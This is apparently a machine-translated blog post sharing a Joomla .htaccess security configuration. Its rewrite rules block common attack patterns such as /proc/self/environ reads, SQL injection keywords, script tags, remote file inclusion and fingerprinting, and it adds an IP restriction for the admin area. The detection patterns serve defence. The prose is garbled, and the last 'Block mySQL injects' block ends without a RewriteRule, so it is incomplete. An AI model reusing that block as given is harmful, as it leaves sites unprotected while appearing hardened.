Reforçar a segurança através do arquivo .htaccess Joomla

Antes da invasão da versão mais antiga do Joomla 1.5 foi modificado muitos arquivos,Depois da renovação de toda a plataforma,Alguns queriam reforçar as medidas de proteção e hábitos,Este registros oficiais da Internet e Joomla! configurações htaccess documentação terminando,Para aumentar a segurança do Joomla!,Os conteúdos oficiais dos documentos eu listei mais de,Mas alguns são muito pouco magra demais,Ou para um determinado conjunto de pacotes,Eu não levá-la。

  ######################################################  ##  ##以下為針對防止遭受攻擊之設置,取自Joomla! Documentation,請放至Joomla根目錄  ##  ######################################################      ########## Begin - Rewrite rules to block out some common exploits  ## If you experience problems on your site block out the operations listed below  ## This attempts to block the most common type of exploit `attempts` to Joomla!  #  # If the request query string contains /proc/self/environ (by SigSiu.net)  RewriteCond %{QUERY_STRING} proc/self/environ [OR]  # Block out any script trying to set a mosConfig value through the URL  # (these attacks wouldn't work w/out Joomla! 1.5's Legacy Mode plugin)  RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]  # Block out any script trying to base64_encode or base64_decode data within the URL  RewriteCond %{QUERY_STRING} base64_(en|de)code[^(]*\([^)]*\) [OR]  ## IMPORTANT: If the above line throws an HTTP 500 error, replace it with these 2 lines:  # RewriteCond %{QUERY_STRING} base64_encode\(.*\) [OR]  # RewriteCond %{QUERY_STRING} base64_decode\(.*\) [OR]  # Block out any script that includes a <script> tag in URL  RewriteCond %{QUERY_STRING} (<|%3C)([^s]*s)+cript.*(>|%3E) [NC,OR]  # Block out any script trying to set a PHP GLOBALS variable via URL  RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]  # Block out any script trying to modify a _REQUEST variable via URL  RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})  # Return 403 Forbidden header and show the content of the root homepage  RewriteRule .* index.php [F]  #  ########## End - Rewrite rules to block out some common exploits        ########## Begin - File injection protection, by SigSiu.net  RewriteCond %{REQUEST_METHOD} GET  RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=http:// [OR]  RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=(\.\.//?)+ [OR]  RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=/([a-z0-9_.]//?)+ [NC]  RewriteRule .* - [F]  ########## End - File injection protection      ########## Begin - Advanced server protection - query strings, referrer and config  # Advanced server protection, version 3.2 - May 2011  # by Nicholas K. Dionysopoulos    ## Disallow PHP Easter Eggs (can be used in fingerprinting attacks to determine  ## your PHP version). See http://www.0php.com/php_easter_egg.php and  ## http://osvdb.org/12184 for more information  RewriteCond %{QUERY_STRING} \=PHP[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12} [NC]  RewriteRule .* - [F]    ## SQLi first line of defense, thanks to Radek Suski (SigSiu.net) @  ## http://www.sigsiu.net/presentations/fortifying_your_joomla_website.html  ## May cause problems on legitimate requests  RewriteCond %{QUERY_STRING} concat[^\(]*\( [NC,OR]  RewriteCond %{QUERY_STRING} union([^s]*s)+elect [NC,OR]  RewriteCond %{QUERY_STRING} union([^a]*a)+ll([^s]*s)+elect [NC]  RewriteRule .* - [F]    ## Referrer filtering for common media files. Replace with your own domain name.  ## This blocks most common fingerprinting attacks ;)  ## Note: Change www\.example\.com with your own domain name, substituting the  ## dots with \.  i.e. use www\.example\.com for www.example.com  ##因要限制domain,怕影響本機測試,暫時先不設  #RewriteRule ^images/stories/([^/]+/)*([^/.]+\.)+(jp(e?g|2)?|png|gif|bmp|css|js|swf|ico)$ - [L]  #RewriteCond %{HTTP_REFERER} .  #RewriteCond %{HTTP_REFERER} !^https?://(www\.)?example\.com [NC]  #RewriteCond %{REQUEST_FILENAME} -f  #RewriteRule \.(jp(e?g|2)?|png|gif|bmp|css|js|swf|ico)$ - [F]    ## Disallow visual fingerprinting of Joomla! sites (module position dump)  ## Initial idea by Brian Teeman and Ken Crowder, see:  ## http://www.slideshare.net/brianteeman/hidden-joomla-secrets  ## Improved by @nikosdion to work more efficiently and handle template  ## and tmpl query parameters  RewriteCond %{QUERY_STRING} (^|&)tmpl=(component|system) [NC]  RewriteRule .* - [L]  RewriteCond %{QUERY_STRING} (^|&)t(p|emplate|mpl)= [NC]  RewriteRule .* - [F]    ## Disallow access to htaccess.txt, configuration.php, configuration.php-dist and php.ini  RewriteRule ^(htaccess\.txt|configuration\.php(-dist)?|php\.ini)$ - [F]    ########## End - Advanced server protection - query strings, referrer and config      ########## Begin - Advanced server protection - paths and files  # Advanced server protection, version 3.2 - May 2011  # by Nicholas K. Dionysopoulos    ## Back-end protection  ## This also blocks fingerprinting attacks browsing for XML and INI files  RewriteRule ^administrator/?$ - [L]  RewriteRule ^administrator/index\.(php|html?)$ - [L]  RewriteRule ^administrator/index[23]\.php$ - [L]  RewriteRule ^administrator/(components|modules|templates|images|plugins)/([^/]+/)*([^/.]+\.)+(jp(e?g|2)?|png|gif|bmp|css|js|swf|html?|mp(eg?|[34])|avi|wav|og[gv]|xlsx?|docx?|pptx?|zip|rar|pdf|xps|txt|7z|svg|od[tsp]|flv|mov)$ - [L]  RewriteRule ^administrator/ - [F]    ## Explicitly allow access only to XML-RPC's xmlrpc/index.php or plain xmlrpc/ directory  RewriteRule ^xmlrpc/(index\.php)?$ - [L]  RewriteRule ^xmlrpc/ - [F]    ## Disallow front-end access for certain Joomla! system directories  RewriteRule ^includes/js/ - [L]  RewriteRule ^(cache|includes|language|libraries|logs|tmp)/ - [F]    ## Allow limited access for certain Joomla! system directories with client-accessible content  RewriteRule ^(components|modules|plugins|templates)/([^/]+/)*([^/.]+\.)+(jp(e?g|2)?|png|gif|bmp|css|js|swf|html?|mp(eg?|[34])|avi|wav|og[gv]|xlsx?|docx?|pptx?|zip|rar|pdf|xps|txt|7z|svg|od[tsp]|flv|mov)$ - [L]  ## Uncomment this line if you have extensions which require direct access to their own  ## custom index.php files. Note that this is UNSAFE and the developer should be ashamed  ## for being so lame, lazy and security unconscious.  # RewriteRule ^(components|modules|plugins|templates)/([^/]+/)*(index\.php)?$ - [L]  ## Uncomment the following line if your template requires direct access to PHP files  ## inside its directory, e.g. GZip compressed copies of its CSS files  # RewriteRule ^templates/([^/]+/)*([^/.]+\.)+php$ - [L]  RewriteRule ^(components|modules|plugins|templates)/ - [F]    ## Disallow access to rogue PHP files throughout the site, unless they are explicitly allowed  RewriteCond %{REQUEST_FILENAME} \.php$  RewriteCond %{REQUEST_FILENAME} !/index[23]?\.php$  ## The next line is to explicitly allow the forum post assistant(fpa-xx)script to run  RewriteCond %{REQUEST_FILENAME} !/fpa-[a-z]{2}\.php  RewriteCond %{REQUEST_FILENAME} -f  RewriteRule ^([^/]+/)*([^/.]+\.)+php$ - [F]    ########## End - Advanced server protection - paths and files       #Block mySQL injects   RewriteCond %{QUERY_STRING} (;|<|>|’|”|\)|%0A|%0D|%22|%27|%3C|%3E|%00).*(/\*|union|select|insert|cast|set|declare|drop|update|md5|benchmark) [NC,OR]     RewriteCond %{QUERY_STRING} \.\./\.\. [OR]     RewriteCond %{QUERY_STRING} (localhost|loopback|127\.0\.0\.1) [NC,OR]   RewriteCond %{QUERY_STRING} \.[a-z0-9] [NC,OR]   RewriteCond %{QUERY_STRING} (<|>|’|%0A|%0D|%27|%3C|%3E|%00) [NC]   # Note: The final RewriteCond must NOT use the [OR] flag.  

另外亦可在administrator目錄底下放置另一htaccess文件以限制登入後台的IP

  <IfModule mod_rewrite.c>  RewriteEngine On  RewriteCond %{REMOTE_ADDR} !^172.20.8.  RewriteRule .* /404.php [R,L]  </IfModule>  

Referência [link]

// ]]>

Deixe um comentário

Por favor, note: Comentário moderação é ativado e pode atrasar o seu comentário. Não há necessidade de reenviar o seu comentário.